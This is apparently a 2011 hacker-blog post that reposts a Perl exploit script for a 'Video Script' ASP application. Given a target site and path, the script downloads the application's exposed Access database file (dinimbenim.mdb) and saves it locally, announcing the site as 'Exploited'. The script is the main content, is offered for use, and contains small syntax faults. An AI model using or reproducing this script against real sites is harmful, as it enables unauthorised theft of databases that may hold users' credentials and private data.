Video Script ASP Database Disclosure Exploit#!/usr/bin/perl -w # # Video Script ASP Database Disclosure Exploit # # Found & Coded: Tringle2011 & induska & Cyber Sec # Date: 25/04/2011 # # Download : http://www.scriptmafia.org/ use LWP::Simple; use LWP::UserAgent; system('cls'); system('Video Script ASP Database Disclosure Exploit'); system('color a'); if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; } "; ($TargetIP, $path, $File,) = @ARGV; $File="destination/dinimbenim.mdb"; my $url = "http://" . $TargetIP . $path . $File; print "\n wait!!! \n\n"; my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/dinimbenim.mdb"); if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/dinimbenim.mdb\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); }
This Blog is for intellectual computer persons. Who not only like computing but feel proud to be a computer maniac. More over this is the place for hackers and Programmers. We Shall Over Come !!!!!
Post Your Wish
Tuesday, May 17, 2011
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment